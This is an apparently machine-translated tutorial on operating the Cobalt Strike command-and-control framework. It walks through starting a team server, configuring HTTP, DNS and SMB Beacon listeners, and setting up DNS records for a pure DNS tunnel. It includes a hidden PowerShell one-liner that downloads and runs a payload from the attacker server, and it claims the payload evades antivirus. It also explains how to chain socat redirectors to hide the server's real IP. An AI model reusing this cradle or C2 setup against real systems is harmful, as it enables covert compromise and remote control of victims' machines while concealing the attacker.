Cobalt Strike Use C/S framework ,Cobalt Strike The client of connects to the team server , The team server connects to the target , in other words Cobalt Strike The client of does not interact with the target server

The server （Team Server）

· Generate attack payload （payload）

· Download attack code ( It will provide attack code download on the port set by the server )

· Monitor （ Port listening ）

· Team Server logging Save in logs Folder

· Support team collaboration

· Cobalt Strike Team servers can only run on Linux In the environment

client （Client）

· Cross platform 、 Yes Java The running environment can run

· Support multiple servers , You can connect to multiple servers

Basic use

The client connects to the server

Server side start

[email protected]:~/ desktop /CobaltStrike4.1# ./teamserver 192.168.179.128  ocean
#  ./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]

Client connection

· Windows double-click bat file , Input IP、 password 、 user name （ Customize ）, Click on Connect that will do

· Linux Direct operation start.sh Script files , Enter... For the team server IP、 Password and user name （ Customize ） Connect

go online CS Basic steps

#  Basic steps 
1.  Set listener （Linster）
2.  Generate attack payload （Payload）
3.  Target machine （Victim） function , go online cs

Set listener （Linster）

Click the headset icon to configure monitoring

Set related properties

Generate attack payload （Payload）

attack -> Phishing attack ->web Script delivery

Set parameters , You can also set payload type

stay teamserver Of 80 Port generation payload,victim Use powershell Load into memory to execute , Finally online

Click start code generation

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.179.128:80/a'))"

Target machine （Victim） function , go online cs

stay CS-> View ->web journal Can be seen in payload Access log

payload It also has a killing free effect

In visualization, you can switch views

This is online cs Basic steps , Let's take a look at the definition of the module just used

infrastructure

The first step in any action is to build infrastructure . Just Cobalt Strike for , The infrastructure consists of one or more team servers 、 Redirector and to your team server and redirector DNS Record composition . Once the team server is up and running , You will need to connect to it and configure it to receive connections from the victim system . The monitor is Cobalt Strike The mechanism used to perform this task in .

Monitor

The name of the listener is generally composed of the following structures ：

Operating System/Payload/Stager

for example ：

windows/beacon_http/reverse_http

stay CS Open... In the client Cobalt Strike —》Listeners, After clicking on Add, Now pop up New Listener window

Cobalt Strike There are two types of Monitor ：

· Beacon Beacon The lighthouse 、 beacon 、 To illuminate the meaning of guidance ,Beacon It's a relatively hidden post penetration agent , Personal understanding Beacon The type of monitor should be commonly used .Beacon The name of the listener, for example

windows/beacon_http/reverse_http

· Foreign

Foreign Literal translation is external , This can be understood as an external listener , This type of monitor is mainly used for other Payload Provide aliases , such as Metasploit In the frame Payload, Personal understanding Foreign The monitor has improved to a certain extent CS The compatibility of . The name of the external listener, for example ：

windows/foreign/reverse_https

Beacon

Beacon What is it? ？

· Beacon yes CS Of Payload

· Beacon There are two modes of communication . One is asynchronous communication mode , The communication efficiency of this mode is slow ,Beacon Connect back to the team server 、 Download task 、 Then sleep ; The other is interactive communication mode , This mode of communication happens in real time .

· adopt HTTP、HTTPS and DNS Export Network

· Use SMB The protocol is point-to-point communication

· Beacon There are many post penetration attack modules and remote management tools

Beacon The type of

HTTP and HTTPS Beacon

HTTP and HTTPS Beacon It can also be called Web Beacon. By default ,HTTP and HTTPS Beacon adopt HTTP GET Request to download tasks . these Beacon adopt HTTP POST Request to return data

windows/beacon_http/reverse_http
windows/beacon_https/reverse_https

DNS Beacon

windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http

SMB Beacon

SMB Beacon It can also be called pipe beacon

windows/beacon_smb/bind_pipe

DNS Beacon

DNS Beacon, As the name implies, it is to use DNS The request will be Beacon return . these DNS The request is used to parse by your CS Team server as authority DNS Domain name of the server .

DNS Respond to tell Beacon Hibernate or connect to a team server to download tasks .DNS The response also tells Beacon How to download tasks from your team server

stay CS 4.0 And later ,DNS Beacon It's a DNS Of Payload, In this Payload There is no HTTP Communication mode , This is a different place from before

advantage ： The Trojan horse has good concealment , The victim doesn't open any ports , Can circumvent the firewall , go 53 port

shortcoming ： Slow response

DNS request

One DNS General process of request ：

Browser's dns cache -> Local host file ->DNS The server -> root DNS The server

· Record type

Identify what type of records the domain name corresponds to . The type is A, Indicates that the domain name corresponds to IP Address . The type is MX when , Indicates that the domain name corresponds to the mail server . The type is PTR, Express basis IP Address reverse lookup domain name . The type is CNAME, Means to query domain name related aliases

· NS Record

NS representative “ Domain name server ”, The domain name server record indicates which DNS The server is authoritative for the domain （ namely , Which server contains the actual DNS Record ）. Basically ,NS The record tells the Internet where to find the domain IP Address . A domain usually has multiple NS Record , These records indicate the primary and secondary domain name servers for the domain . If not configured correctly NS Record , Users will not be able to load websites or applications

principle

Original DNS Beacon There are two ways to transmit , One is to use HTTP To download Payload（ No stage Stageless）, One is to use DNS TXT Record to download Payload（ With stage download Stager）, But now, 4.0 In the version , No more HTTP The way ,CS4.0 And the future version is just DNS TXT Record this choice

When we give CS Of teamserver Make a domain name and configure the corresponding A Record and point to itself A Records of the NS After recording ,DNS The request will be iterated to the local of the query DNS The server leads to... Step by step teamserver,teamserver Received a special request from the server DNS After the request, you can interact with it with the encapsulated encrypted communication protocol

experiment

First, you need to configure the domain name , If you have your own domain name, you can use it directly , If not, it needs to be built on the intranet DNS The server

By domain name ocean.cn For example , Use a public network Of Linux The ECS of the system acts as C&C The server needs to be released in the security group 50050 Port and 53 port

./teamserver ip password

Add one A The record points to CS Public network of servers IP

add to NS(name server) Record ,, Host records can be dns, The record value is cs.ocean.cn,NS Record is to hand over the parsing task to a specified " authority "dns The server ( ad locum teamserver It's ours " authority "dns), You can add a few more

Create a listener ,payload choice Beacon DNS（ The version I use is 4.1 This is the only one ）,DNS Hosts Fill in NS Record and A Record the corresponding name ,DNS Host Fill in A Record the corresponding name

Generate payload, Be careful 80 The port needs to be open and unoccupied in the security group

victim After performing ,web You can see the access log in the log , It will take some time to go online

By default , The host information is black

The following commands need to be executed ( Or perform any operation, such as ： Screen capture ), Let the target host information display

checkin
mode dns-txt

because DNS The source of the packet is the proxy query DNS The server is not the real exit of the controlled machine IP, So... Will not be shown here external Of IP Address

Attack process

According to the previous recorded value , The whole process is when the request data.dns.ocean.com When there is cs.ocean.cn Responsible for parsing , then cs.ocean.cn The record itself has A There is a corresponding record IP Address ,teamserver Configuration of the dns listener（cs in listener Of dns hosts Set to dns.ocean.cn）, Then you can teamserver communicate

Avoid pit

Most online articles , When configuring listeners, you use DNS Hosts Fill in NS Record and A Record the corresponding name ,DNS Host Fill in A Record the corresponding name , This is the case in the figure below

With this configuration , Online can really , But the type of successful launch is beacon(stageless),CS4 Medium DNS Beacon Is really pure DNS Tunnel , In the previous work, the common way is to http Form transfer , It didn't work dns The real effect

Correct should be all for NS Parsing records

The specific reasons can be seen in this article ：https://xz.aliyun.com/t/7938

Recommended reading ：https://paper.seebug.org/1568/

Retainers

Redirector Redirectors It's a place in CS The server between the team server and the target network , This redirector is a simple proxy tool , Or port forwarding tools , As a CS The springboard role between the server and the target server , The overall flow is like the following

 Target target  <--------> Multiple parallel redirectors <------>CS The server 

Redirector plays an important role in the process of attack or defense , There are two main points ：

· Protect your CS The server , Avoid the goal of finding your truth IP

· Improve overall reliability , Because you can set up multiple redirectors , So if some redirectors stop working , On the whole, the system can still work normally

Usually use Socat Tools as CS Redirector for

experiment

The experiment uses Intranet environment

· CS The server IP：192.168.179.128

· Target target IP：192.168.179.148

· Redirector IP：192.168.179.147、192.168.179.141

You can also add a DNS The server simulates the real environment , Real penetration IP All are public networks IP（ Of course hacker Can be a local area network IP）, The following is the topology , Ignoring the details of network routing

Configure redirector

First, you need to configure the port forwarding of the redirector , For example, use HTTP Beacon, On the redirector server, use the following command to the redirector 8011 Port forward to TeamServer Of 8011 port

socat TCP4-:LISTEN:8011,fork TCP4:[TeanServer IP:Port]
#  In the experimental environment, it is 
socat TCP4-LISTEN:8011,fork TCP4:192.168.179.128:8011
#  No, socat Just use 
apt-get install socat

New listener

Add both redirectors to http hosts in

Generative attack payload（ The online machine is the effect after execution ）

web journal

You can see ExteralIP and web The log shows that the two redirectors have taken effect